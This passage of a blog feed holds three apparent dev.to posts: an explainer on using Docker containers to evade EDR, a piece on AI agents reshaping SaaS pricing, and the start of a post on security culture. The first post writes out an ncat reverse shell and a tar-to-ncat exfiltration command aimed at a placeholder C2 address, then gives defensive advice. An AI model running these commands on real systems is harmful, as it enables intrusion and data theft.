&lt;span class="nv"&gt;$ &lt;/span&gt;docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; ~/Desktop:/lib/modules &lt;span class="nt"&gt;-it&lt;/span&gt; ubuntu /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;--rm&lt;/code&gt; flag auto-deletes the container on exit.&lt;br&gt;
&lt;strong&gt;Traces on the host? Minimal.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Method B: Bake Data Into a Docker Image&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:latest&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; ./secret /lib/modules/&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; ncat
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["/bin/bash"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Package the sensitive data into the image itself.&lt;br&gt;
Carry it anywhere Docker is installed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Method C: Sideload Into a Running Container&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Copy files into an already-running legitimate container&lt;/span&gt;
&lt;span class="nv"&gt;$ &lt;/span&gt;docker &lt;span class="nb"&gt;cp &lt;/span&gt;secret.txt &amp;lt;container_id&amp;gt;:/lib/modules/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No new container launch. No unusual process activity.&lt;br&gt;
&lt;strong&gt;The stealthiest option of the three.&lt;/strong&gt;&lt;/p&gt;


&lt;h3&gt;
  
  
  Phase 2: Exfiltrating Data Out
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Method A: Reverse Shell&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Establish a reverse shell from inside the container to C2&lt;/span&gt;
ncat XX.XX.XX.XX 3333 &lt;span class="nt"&gt;-e&lt;/span&gt; /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once the shell is open, the attacker operates &lt;strong&gt;entirely outside&lt;br&gt;
EDR's view&lt;/strong&gt; — interactively, freely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Method B: Direct Data Streaming&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Archive and stream data straight to the C2 server&lt;/span&gt;
&lt;span class="nb"&gt;tar &lt;/span&gt;cf - /lib/modules/ | ncat XX.XX.XX.XX 3333
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No interactive session needed. Fast, efficient, hard to catch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Attackers Love This: 4 Key Advantages
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Advantage&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;EDR-free shell&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No dramatic EDR disabling needed — just blend into normal docker usage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Instant attack environment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pre-built image deploys anywhere Docker exists. No tool downloads needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Persistence &amp;amp; lateral movement&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Long-running containers become network footholds for scanning internal hosts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Easy cleanup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Delete the image, wipe shell history — evidence almost gone&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  It's Not Just Theory: Real Attacks Already Use This
&lt;/h2&gt;

&lt;p&gt;Elastic Security Labs reported that &lt;strong&gt;"TraderTraitor"&lt;/strong&gt; — a&lt;br&gt;
North Korea-linked threat actor — weaponized Docker in real macOS&lt;br&gt;
attacks.&lt;/p&gt;

&lt;p&gt;The attack delivered a malicious Python app disguised as a stock&lt;br&gt;
trading tool, packaged inside a Docker container.&lt;/p&gt;

&lt;p&gt;Apple's Endpoint Security Framework (ESF) has limited visibility&lt;br&gt;
into container internals. EDR could detect that a "trusted Docker&lt;br&gt;
process" was accessing SSH keys and AWS credentials — but &lt;strong&gt;couldn't&lt;br&gt;
determine whether it was a developer or an attacker.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The container was the perfect disguise.&lt;/p&gt;




&lt;h2&gt;
  
  
  Docker Isn't Alone: Windows Sandbox Has the Same Problem
&lt;/h2&gt;

&lt;p&gt;The same concept applies to Windows Sandbox — a lightweight, isolated&lt;br&gt;
temporary desktop environment built into Windows.&lt;/p&gt;

&lt;p&gt;Like Docker containers, &lt;strong&gt;processes inside Windows Sandbox are hidden&lt;br&gt;
from the host's EDR.&lt;/strong&gt; Attackers can execute malicious code, download&lt;br&gt;
payloads, and prep their attack — then close the Sandbox and&lt;br&gt;
&lt;strong&gt;erase every trace instantly.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Different tool, identical logic:&lt;br&gt;
&lt;em&gt;use legitimate isolation technology to create a surveillance-free zone.&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Evolution of EDR Bypass Techniques
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Core Idea&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Early 2020s&lt;/td&gt;
&lt;td&gt;Malware obfuscation &amp;amp; signature bypass&lt;/td&gt;
&lt;td&gt;Hide malicious files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mid 2020s&lt;/td&gt;
&lt;td&gt;BYOI (Bring Your Own Installer)&lt;/td&gt;
&lt;td&gt;Abuse legitimate installers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Now&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;BYOC (Bring Your Own Container)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Hide inside trusted dev tools&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The trend is clear: attackers have moved from&lt;br&gt;
&lt;em&gt;"sneak in a malicious file"&lt;/em&gt; to&lt;br&gt;
&lt;strong&gt;"hide inside something you already trust."&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  A Hardware Engineer's Perspective
&lt;/h2&gt;

&lt;p&gt;As a semiconductor engineer, containerized development environments&lt;br&gt;
are increasingly common in my world too — simulation tools, EDA&lt;br&gt;
software, verification pipelines running in Docker.&lt;/p&gt;

&lt;p&gt;Reading this article made me ask some uncomfortable questions about&lt;br&gt;
my own environment:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Who actually has Docker permissions?&lt;/strong&gt; High privileges are required
to install Docker, but in practice, do we know exactly who can run
containers on production-adjacent machines?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What networks can containers reach?&lt;/strong&gt; If a container can talk to
the manufacturing control network, a compromised container becomes
a launchpad for lateral movement across critical systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Are we logging container activity?&lt;/strong&gt; The &lt;code&gt;--rm&lt;/code&gt; flag is standard
practice for clean dev workflows — but it's also ideal for attackers.
Do we have any retention policy for container execution logs?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The assumption that "Docker = developer tool = safe" is exactly the&lt;br&gt;
gap attackers are exploiting. In environments where OT and IT&lt;br&gt;
boundaries are already blurring, BYOC is not a distant threat.&lt;/p&gt;




&lt;h2&gt;
  
  
  Takeaways &amp;amp; Next Actions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Bottom line: The more trusted the tool, the better the hiding spot.&lt;br&gt;
Docker is trusted by everyone — including attackers.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's what to check right now:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Audit who has Docker execution privileges&lt;/strong&gt; — apply least-privilege
principles strictly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Review container network settings&lt;/strong&gt; — restrict unnecessary external
communication&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Preserve container launch logs&lt;/strong&gt; — even if &lt;code&gt;--rm&lt;/code&gt; deletes the
container, logging infrastructure should retain the record&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ask your EDR vendor about container visibility&lt;/strong&gt; — does your current
EDR have insight into processes running inside containers?&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Security technology built to protect becomes the attacker's shelter.&lt;br&gt;
The engineers who understand that irony are the ones who can actually&lt;br&gt;
defend against it.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources:&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;Think IT — "EDR Bypass via Docker: Bring Your Own Container"&lt;/em&gt;
&lt;em&gt;(March 13, 2026)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Elastic Security Labs — "Bit ByBit: Emulation of the DPRK's Largest&lt;/em&gt;
&lt;em&gt;Cryptocurrency Heist"&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Itochu CI Systems — "Hack The Sandbox: Uncovering the Truth Behind&lt;/em&gt;
&lt;em&gt;Vanished Traces" (March 12, 2025)&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>"AI Didn't Kill SaaS — It Turned SaaS Into Something Unrecognizable"</title>
      <dc:creator>KABUKI</dc:creator>
      <pubDate>Fri, 20 Mar 2026 23:57:15 +0000</pubDate>
      <link>https://dev.to/kabuki_engineer/ai-didnt-kill-saas-it-turned-saas-into-something-unrecognizable-4ihe</link>
      <guid>https://dev.to/kabuki_engineer/ai-didnt-kill-saas-it-turned-saas-into-something-unrecognizable-4ihe</guid>
      <description>&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;AI agents triggered a &lt;strong&gt;$1.6 trillion wipeout&lt;/strong&gt; in software stocks in
early 2026&lt;/li&gt;
&lt;li&gt;SaaS's core business model — &lt;strong&gt;seat-based pricing&lt;/strong&gt; — is under
structural threat&lt;/li&gt;
&lt;li&gt;SaaS won't disappear, but it's transforming from a &lt;strong&gt;human tool into
AI infrastructure&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Pricing is rapidly shifting from per-seat to
&lt;strong&gt;outcome-based models&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;A new concept is emerging: &lt;strong&gt;SaS (Service as Software)&lt;/strong&gt; —
where AI delivers results, not just features&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Background: Why Is SaaS Suddenly Under Fire?
&lt;/h2&gt;

&lt;p&gt;In early 2026, Anthropic and OpenAI dropped back-to-back announcements&lt;br&gt;
that shook the software world:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Cowork&lt;/strong&gt; (Jan 12, 2026) — A desktop tool letting AI
autonomously handle business tasks without writing a single line of code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Frontier&lt;/strong&gt; (Feb 5, 2026) — OpenAI's enterprise platform for
building, deploying, and managing AI agents at scale&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The market reaction was swift and brutal. The S&amp;amp;P 500 Software &amp;amp; Services&lt;br&gt;
Index dropped roughly &lt;strong&gt;23% year-to-date&lt;/strong&gt;, wiping out approximately&lt;br&gt;
&lt;strong&gt;$1.6 trillion in market cap&lt;/strong&gt; (Wall Street Journal, Feb 2026).&lt;/p&gt;

&lt;p&gt;Jefferies Financial Group's Jeffrey Favuzza called it the&lt;br&gt;
&lt;strong&gt;"SaaSpocalypse."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not just panic — a structural reckoning.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Timeline: How the SaaS Shock Unfolded
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Market Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Jan 12, 2026&lt;/td&gt;
&lt;td&gt;Anthropic launches Claude Cowork&lt;/td&gt;
&lt;td&gt;Software stocks begin declining&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Jan 30, 2026&lt;/td&gt;
&lt;td&gt;Anthropic releases 11 open-source plugins for white-collar work&lt;/td&gt;
&lt;td&gt;6 consecutive days of decline, ~$830B in market cap erased&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feb 5, 2026&lt;/td&gt;
&lt;td&gt;OpenAI announces Frontier&lt;/td&gt;
&lt;td&gt;Direct competition with Salesforce, Workday&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feb 20, 2026&lt;/td&gt;
&lt;td&gt;Claude Code Security launched&lt;/td&gt;
&lt;td&gt;JFrog -25%, CrowdStrike &amp;amp; Zscaler -10%, ~$15B lost in 2 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feb 24, 2026&lt;/td&gt;
&lt;td&gt;Anthropic announces SaaS partnerships&lt;/td&gt;
&lt;td&gt;Stocks slightly rebound as "complement not replace" narrative emerges&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Two Structural Threats to SaaS
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;① The death of seat-based pricing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If AI agents handle the work, fewer humans log into SaaS tools.&lt;br&gt;
Fewer humans logging in = fewer seats = less revenue.&lt;br&gt;
The model that powered 20 years of SaaS growth is cracking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;② AI agents becoming SaaS competitors&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The 11 plugins Anthropic released included file management, document&lt;br&gt;
creation, and data analysis — features SaaS companies have charged&lt;br&gt;
for. AI agents don't just &lt;em&gt;use&lt;/em&gt; SaaS. They can &lt;em&gt;become&lt;/em&gt; SaaS.&lt;/p&gt;




&lt;h2&gt;
  
  
  This Isn't the First "SaaS Is Dead" Moment
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;New Tech&lt;/th&gt;
&lt;th&gt;The Claim&lt;/th&gt;
&lt;th&gt;What Actually Happened&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Mid-2010s&lt;/td&gt;
&lt;td&gt;API Economy&lt;/td&gt;
&lt;td&gt;APIs alone will replace SaaS&lt;/td&gt;
&lt;td&gt;Stripe &amp;amp; Twilio became SaaS/PaaS themselves&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Late 2010s&lt;/td&gt;
&lt;td&gt;No-code/Low-code&lt;/td&gt;
&lt;td&gt;Build it yourself, skip SaaS&lt;/td&gt;
&lt;td&gt;Became a complement to existing SaaS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026&lt;/td&gt;
&lt;td&gt;AI Agents&lt;/td&gt;
&lt;td&gt;AI will replace SaaS&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Still unfolding...&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Bain &amp;amp; Company put it well: technology revolutions rarely produce&lt;br&gt;
winner-take-all outcomes. Mainframes, on-premise servers, and PCs were&lt;br&gt;
all supposed to die — and none of them fully did.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Great Debate: Will AI Kill SaaS?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The "Yes" Camp
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Microsoft CEO Satya Nadella&lt;/strong&gt; suggested SaaS is essentially just&lt;br&gt;
CRUD logic wrapped in UI — something AI agents can replicate.&lt;br&gt;
&lt;strong&gt;Charles Lamanna&lt;/strong&gt; (Microsoft) went further, predicting traditional&lt;br&gt;
business apps will be obsolete by 2030.&lt;/p&gt;

&lt;p&gt;Forrester identified 4 structural concerns investors now have about SaaS:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concern&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Platform power shift&lt;/td&gt;
&lt;td&gt;Foundation AI companies (Anthropic, OpenAI) capture value that SaaS can't&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seat demand collapse&lt;/td&gt;
&lt;td&gt;Automation reduces the number of human users needing licenses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vibe Coding&lt;/td&gt;
&lt;td&gt;AI-assisted coding lets companies rebuild SaaS features in-house&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SaaS sprawl&lt;/td&gt;
&lt;td&gt;Enterprises average 275 SaaS apps — pressure to cut is real&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Real example: Cursor VP Lee Robinson replaced the entire Sanity CMS&lt;br&gt;
with an AI-coded system built from scratch — saving tens of thousands&lt;br&gt;
of dollars per month.&lt;/p&gt;

&lt;h3&gt;
  
  
  The "No" Camp
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Nvidia CEO Jensen Huang&lt;/strong&gt; said markets "got it wrong" on the AI&lt;br&gt;
threat to software companies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Salesforce CEO Marc Benioff&lt;/strong&gt; pushed back hard:&lt;br&gt;
SaaS holds the governance, compliance, and metadata layers that AI&lt;br&gt;
&lt;em&gt;needs&lt;/em&gt; to function safely. Letting AI touch raw data without&lt;br&gt;
role-based access control and audit trails is a security nightmare.&lt;br&gt;
SaaS isn't below AI — it's the trusted middle layer AI runs on.&lt;/p&gt;

&lt;p&gt;And the numbers backed him up. Salesforce's FY26 Q4 results showed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Annual revenue: &lt;strong&gt;$41.5B (+10% YoY)&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Agentforce ARR: &lt;strong&gt;+169% YoY&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;SaaS isn't dying. It's absorbing AI and growing.&lt;/p&gt;




&lt;h2&gt;
  
  
  How SaaS Companies Are Responding
&lt;/h2&gt;

&lt;p&gt;The pricing model transformation is already underway:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Company&lt;/th&gt;
&lt;th&gt;New Pricing Model&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Salesforce&lt;/td&gt;
&lt;td&gt;Unlimited agents for a flat fee (AELA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ServiceNow&lt;/td&gt;
&lt;td&gt;Consumption-based pricing tied to AI outcomes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intercom&lt;/td&gt;
&lt;td&gt;Per-ticket pricing for AI-resolved issues&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sierra.ai&lt;/td&gt;
&lt;td&gt;Outcome-based: pay only when results are delivered&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The direction is clear: &lt;strong&gt;from seats × price to value × outcome.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  A Hardware Engineer's Take
&lt;/h2&gt;

&lt;p&gt;As a semiconductor engineer, I find this debate fascinating — and&lt;br&gt;
closer to home than it might seem.&lt;/p&gt;

&lt;p&gt;Manufacturing systems run on long lifecycles. Factory equipment stays&lt;br&gt;
in place for 5–10 years. But the software landscape underneath it&lt;br&gt;
changes radically in that same window. The SaaS shock is a reminder&lt;br&gt;
that &lt;strong&gt;"deploy it and forget it" thinking doesn't survive anymore.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;What strikes me most is the SaaS → SaS conceptual shift:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;SaaS (old model)&lt;/strong&gt;: Here's a tool. You use it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SaS (new model)&lt;/strong&gt;: Here's the outcome. AI handled the rest.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We're seeing early versions of this in manufacturing too — AI handling&lt;br&gt;
anomaly detection, predictive maintenance, and process optimization.&lt;br&gt;
The human stops staring at dashboards and starts reviewing AI-generated&lt;br&gt;
summaries.&lt;/p&gt;

&lt;p&gt;But the friction is real. Legacy OT (Operational Technology) systems&lt;br&gt;
often can't meet the prerequisites that AI agents require:&lt;br&gt;
clean API connectivity, consistent data quality, auditable guardrails.&lt;br&gt;
The path from SaaS to SaS in industrial environments will be long —&lt;br&gt;
and full of integration challenges that pure software engineers rarely&lt;br&gt;
have to face.&lt;/p&gt;




&lt;h2&gt;
  
  
  Takeaways &amp;amp; Next Actions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Bottom line: SaaS isn't dying.&lt;br&gt;
But its identity is changing — from human-facing tool to AI-native&lt;br&gt;
infrastructure.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's what I'd focus on now:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Learn MCP (Model Context Protocol)&lt;/strong&gt; — The open standard connecting
AI agents to external tools. Already adopted by AWS, Google Cloud,
Azure, Cloudflare, and all major AI platforms.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Watch the pricing shift&lt;/strong&gt; — Outcome-based models will change how
software is budgeted and procured in your org.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Distinguish vertical vs. horizontal SaaS&lt;/strong&gt; — Vertical SaaS with
deep regulatory data (Epic, Bloomberg, Veeva) is resilient.
Generic horizontal tools face the highest substitution risk.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design for AI, not just humans&lt;/strong&gt; — Clean data structures and
well-documented APIs matter more than ever when AI is the consumer.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The value of software is shifting from &lt;em&gt;providing features&lt;/em&gt; to&lt;br&gt;
&lt;em&gt;completing work&lt;/em&gt;. SaaS to SaS. The acronym barely changes.&lt;br&gt;
The business model changes entirely.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources:&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Think IT — "Will SaaS Disappear in the Age of AI Agents?" (Mar 19,
2026)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Wall Street Journal, CNBC, Reuters, Fortune, Bain &amp;amp; Company,&lt;/em&gt;
&lt;em&gt;Forrester, Salesforce IR, Foundation Capital&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;NIST Cybersecurity Framework 2.0&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>agents</category>
      <category>ai</category>
      <category>news</category>
      <category>saas</category>
    </item>
    <item>
      <title>"Who's Really Securing Your Company? The Answer Might Shock You"</title>
      <dc:creator>KABUKI</dc:creator>
      <pubDate>Fri, 20 Mar 2026 16:42:49 +0000</pubDate>
      <link>https://dev.to/kabuki_engineer/whos-really-securing-your-company-the-answer-might-shock-you-721</link>
      <guid>https://dev.to/kabuki_engineer/whos-really-securing-your-company-the-answer-might-shock-you-721</guid>
      <description>&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Most cyber incidents ultimately trace back to &lt;strong&gt;human error&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Technical defenses like EDR and firewalls alone have clear limits&lt;/li&gt;
&lt;li&gt;Japan is launching a &lt;strong&gt;Supply Chain Security Evaluation Standard in October 2026&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Building a &lt;strong&gt;"safety culture"&lt;/strong&gt; is now essential for organizational security&lt;/li&gt;
&lt;li&gt;As AI spreads, &lt;strong&gt;human judgment matters more than ever&lt;/strong&gt; — not less&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Background: Why Are We Suddenly Talking About "People"?
&lt;/h2&gt;

&lt;p&gt;In 2026, companies worldwide are pouring money into technical security&lt;br&gt;
measures — EDR, zero trust architecture, VPN hardening, you name it.&lt;/p&gt;

&lt;p&gt;But here's what a KnowBe4 Japan seminar in March 2026 made crystal clear:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The root cause of most cyber incidents is, ultimately, human error.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;And not the "oops, I clicked the wrong button" kind of error.&lt;/p&gt;

&lt;p&gt;We're talking about the accumulation of &lt;em&gt;rational decisions&lt;/em&gt; — choosing&lt;br&gt;
convenience over compliance, or unknowingly bending security guidelines&lt;br&gt;
because getting the job done felt more important. These small, reasonable&lt;br&gt;
choices stack up and create gaps equivalent to zero-day vulnerabilities.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Changing: Japan's Supply Chain Security Standard (October 2026)
&lt;/h2&gt;

&lt;p&gt;Starting October 2026, Japan will fully enforce a &lt;strong&gt;Supply Chain&lt;br&gt;
Security Evaluation Standard&lt;/strong&gt; covering everyone from IT system vendors&lt;br&gt;
to raw material suppliers.&lt;/p&gt;

&lt;p&gt;The goal? &lt;strong&gt;Cyber resilience&lt;/strong&gt; — built on the foundations of NIST's&lt;br&gt;
Cybersecurity Framework (CSF) 2.0.&lt;/p&gt;

&lt;p&gt;This is a shift from "can we prevent attacks?" to&lt;br&gt;
&lt;strong&gt;"can we survive and recover when they happen?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Previously, supply chain security was a mess of asymmetric power dynamics.&lt;br&gt;
Large buyers would monitor their suppliers unilaterally, while suppliers&lt;br&gt;
were forced to respond to different requirements from every single client —&lt;br&gt;
exhausting and inefficient. The new unified standard aims to fix this,&lt;br&gt;
leveling up security across entire supply chains.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Paradigm Shift: From "Tools" to "Culture"
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;Focus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Early 2020s&lt;/td&gt;
&lt;td&gt;Antivirus, Firewalls, EDR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024 – Present&lt;/td&gt;
&lt;td&gt;Zero Trust, Compliance, Incident Response Drills&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026 onwards&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Organizational Safety Culture &amp;amp; Supply Chain Resilience&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

